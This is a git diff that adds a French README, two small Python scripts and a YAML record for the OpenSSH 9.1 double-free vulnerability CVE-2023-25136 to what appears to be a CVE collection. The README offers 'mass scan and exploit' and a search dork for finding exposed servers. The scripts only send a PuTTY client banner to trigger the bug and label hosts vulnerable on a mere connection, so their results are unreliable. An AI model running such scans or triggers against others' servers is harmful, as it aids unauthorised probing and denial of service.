diff --git a/cve/openssh/2023/CVE-2023-25136/README.md b/cve/openssh/2023/CVE-2023-25136/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..787262094c4847f4a7fd308b626b07f3b2c661b4
--- /dev/null
+++ b/cve/openssh/2023/CVE-2023-25136/README.md
@@ -0,0 +1,38 @@
+# CVE-2023-25136
+OpenSSH 9.1 vulnerability mass scan and exploit
+
+# Détails sur la vulnérabilité
+
+Pour rappel, OpenSSH est un logiciel qui implémente le protocole SSH, très fréquemment utilisé pour se connecter à des machines sous Linux (ou Windows) de façon sécurisée pour effectuer de l'administration à distance.
+
+Introduit dans OpenSSH 9.1, la faille de sécurité CVE-2023-25136 affecte le processus de pré-authentification de SSH. En l'exploitant, un attaquant pourrait corrompre la mémoire et parvenir à exécuter du code arbitraire sur la machine, sans être authentifié sur le serveur cible.
+
+# utilisation
+
+Exécuter le script au choix ``scan de liste d'adresses IP`` où ``exploitation direct d'une IP vulnérable``
+
+# requirements
+
+• paramiko : pour l'installer il suffit de taper
+``pip install paramiko``
+
+• pyfiglet : pour l'installer il suffit de taper
+``pip install pyfiglet``
+
+• termcolor : pour l'installer il suffit de taper
+``pip install termcolor``
+
+# Dork
+
+Use <a href="https://www.criminalip.io/asset/search?query=">Criminal IP</a>
+
+Dork : ``SSH-2.0_OpenSSH_9.1``
+
+# More 
+
+<a href="https://jfrog.com/blog/openssh-pre-auth-double-free-cve-2023-25136-writeup-and-proof-of-concept/">Plus de détails sur la vulnérabilité </a>
+# Website
+
+https://christbowel.ml
+
+CTF player 💥 | Bug hunter 💻 | apprenti pentester 🎭
diff --git a/cve/openssh/2023/CVE-2023-25136/openssh-9_1-single_exploit.py b/cve/openssh/2023/CVE-2023-25136/openssh-9_1-single_exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..4e9bd219d98fb647bc9bd0ab69032d11af997687
--- /dev/null
+++ b/cve/openssh/2023/CVE-2023-25136/openssh-9_1-single_exploit.py
@@ -0,0 +1,20 @@
+import paramiko
+import pyfiglet
+
+ascii_text = pyfiglet.figlet_format("openssh 9.1", font="starwars")                                                   
+ascii_text += "\n\033[38;2;255;153;51m\033[2m✨💥by christbowel🎭💻\033[0m"
+print(ascii_text)
+
+print ("")
+
+target_ip = input("Entrer l'adresse ip a exploiter: ")
+CLIENT_ID = "PuTTY_Release_0.64"
+
+def main():
+     transport = paramiko.Transport(target_ip)
+     transport.local_version = f"SSH-2.0-{CLIENT_ID}"
+     transport.connect(username='', password='')
+
+if __name__ == "__main__":
+     main()
+
diff --git a/cve/openssh/2023/CVE-2023-25136/openssh-9_1.py b/cve/openssh/2023/CVE-2023-25136/openssh-9_1.py
new file mode 100644
index 0000000000000000000000000000000000000000..9e6a1cb2272b34a680fc619ef64f2fd3b9e16466
--- /dev/null
+++ b/cve/openssh/2023/CVE-2023-25136/openssh-9_1.py
@@ -0,0 +1,37 @@
+import paramiko
+import socket
+from termcolor import colored
+import pyfiglet
+
+ascii_text = pyfiglet.figlet_format("openssh 9.1", font="starwars")
+ascii_text += "\n\033[38;2;255;153;51m\033[2m✨💥by christbowel🎭💻\033[0m"
+print(ascii_text)
+
+print ("")
+
+ip_file = input("Entrer la liste d'adresse ip a tester 🔥 : ")
+
+client_id = "PuTTY_Release_0.64"
+
+def check_ssh_vulnerability(ip):
+    try:
+        transport = paramiko.Transport(ip, timeout=1)
+
+        transport.local_version = f"SSH-2.0-{client_id}"
+
+        transport.connect(username='', password='')
+
+        print(colored(f"{ip}: Vulnérable", 'green'))
+
+        transport.close()
+
+    except (socket.error, paramiko.AuthenticationException, paramiko.SSHException):
+
+        print(colored(f"{ip}: Non vulnérable", 'red'))
+
+
+with open(ip_file, 'r') as f:
+    for line in f:
+        ip = line.strip()
+        check_ssh_vulnerability(ip)
+
diff --git a/cve/openssh/2023/yaml/CVE-2023-25136.yaml b/cve/openssh/2023/yaml/CVE-2023-25136.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..1c97cf2e2210d68a7c9e8df60c6bf6c75ff0707b
--- /dev/null
+++ b/cve/openssh/2023/yaml/CVE-2023-25136.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-25136
+source: https://github.com/Christbowel/CVE-2023-25136
+info:
+  name: OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
+  severity: medium
+  description: 
+    OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be leveraged, by an unauthenticated remote attacker in the default configuration, to jump to any location in the sshd address space. One third-party report states "remote code execution is theoretically possible."
+  scope-of-influence:
+    openssh 9.1
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2023-25136
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
+    cvss-score: 6.5
+    cve-id: CVE-2023-25136
+    cwe-id: CWE-415
+    cnvd-id: None
+    kve-id: None
+  tags: openssh, cve-2023
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 516c3adcfb636c223957496aa015901a0b61ef07..db7f750a313c4a6bb62135dd5e063a4ebec099f0 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -22,4 +22,6 @@ cve:
     - CVE-2021-1056
   java-spring-cloud-gateway:
     - CVE-2022-22947
+  openssh:
+    - CVE-2023-25136
 cnvd: